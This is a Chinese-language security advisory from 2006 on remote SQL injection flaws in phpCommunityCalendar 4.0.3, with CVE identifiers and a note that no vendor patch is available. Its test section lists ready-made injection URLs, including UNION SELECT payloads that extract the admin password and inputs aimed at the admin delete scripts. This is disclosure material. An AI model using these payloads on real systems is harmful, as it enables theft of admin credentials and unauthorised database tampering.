phpCommunityCalendar多个脚本远程SQL注入漏洞
发布日期:2006-06-07
更新日期:2006-06-07
受影响系统:AppIdeas.com phpCommunityCalendar 4.0.3
描述:
CVE(CAN) ID:
CVE-2006-2798,
CVE-2006-2797
phpCommunityCalendar是一款基于WEB的PHP编写的协同工作程序。
phpCommunityCalendar对用户提交给的参数缺少正确充分的过滤,远程攻击者可以利用此漏洞非授权操作数据库。
phpCommunityCalendar的多个脚本对用户提交的多个参数数据缺少充分过滤,远程攻击者可以通过在输入数据中插入特定的SQL命令来非授权获取对数据库的访问。
<**>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://[SERVER]/[PATH]/month.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*
http://[SERVER]/[PATH]/day.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*
http://[SERVER]/[PATH]/event.php?ID=(1=1) [SQL]
http://[SERVER]/[PATH]/admin/delCalendar.php?CalendarDetailsID=x'[SQL]
http://[SERVER]/[PATH]/admin/delAdmin.php?AdminUserID=x' [SQL]
http://[SERVER]/[PATH]/admin/delAddress.php?EventLocationID=x' [SQL]
http://[SERVER]/[PATH]/admin/delCategory.php?LocationID=x' [SQL]
建议:
厂商补丁:
AppIdeas.com
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://open.appideas.com/Calendar/浏览次数:3205
严重程度:0(网友投票)
